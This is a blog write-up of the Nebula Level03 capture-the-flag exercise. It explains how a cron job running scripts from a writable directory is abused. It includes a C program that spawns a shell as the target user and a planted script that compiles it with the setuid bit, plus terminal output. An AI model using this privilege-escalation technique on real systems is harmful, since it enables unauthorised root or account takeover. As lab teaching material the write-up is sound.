Mike-Boya

Information Security and Programming Blog

Exploit Exercises - Nebula Level03

The details page for Level03 contains a hint directing us to the home directory of flag03. After navigating to the target home directory and listing out the files, I was presented with a shell script called writable.sh and a directory called writable.d.

I took a look at the shell script and it contained the following:

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done

This code will execute anything placed in the writable.d directory when it is called. The details section also mentioned a crontab that is called every couple of minutes.

This challenge was a little tougher because I wanted to gain shell access and not just cat out a log file that contained the getflag output. After trying to approach the problem the same way as Level00, I came up short because bash will ignore the SUID bit.

I went with a different approach and after grabbing the uid/gid from /etc/passwd I created some code to spawn a shell.

#include <stdio.h>

int main()
{
    setresuid(996, 996, 996);
    setresgid(996, 996, 996);
    system( "/bin/bash" );
    return 0;
}

Then, I placed a bash script in writable.d that will compile my code.

#!/bin/bash

gcc /tmp/foo.c -o /home/flag03/level03
chmod +xs /home/flag03/level03

I waited for cron to run, then moved to /home/flag03 and executed my newly compiled level03 program.

level04@nebula:/home/flag03$ id
uid=1004(level03) gid=1004(level03) groups=1004(level03)
level03@nebula:/home/flag03$ ./level03
flag03@nebula:/home/flag03$ id
uid=996(flag03) gid=996(flag03) groups=996(flag03),1004(level03)
flag03@nebula:/home/flag03$ getflag
You have successfully executed getflag on a target account

Success! After running the program I was presented with a shell and able to run getflag on a target account.

Thanks for reading!

Mike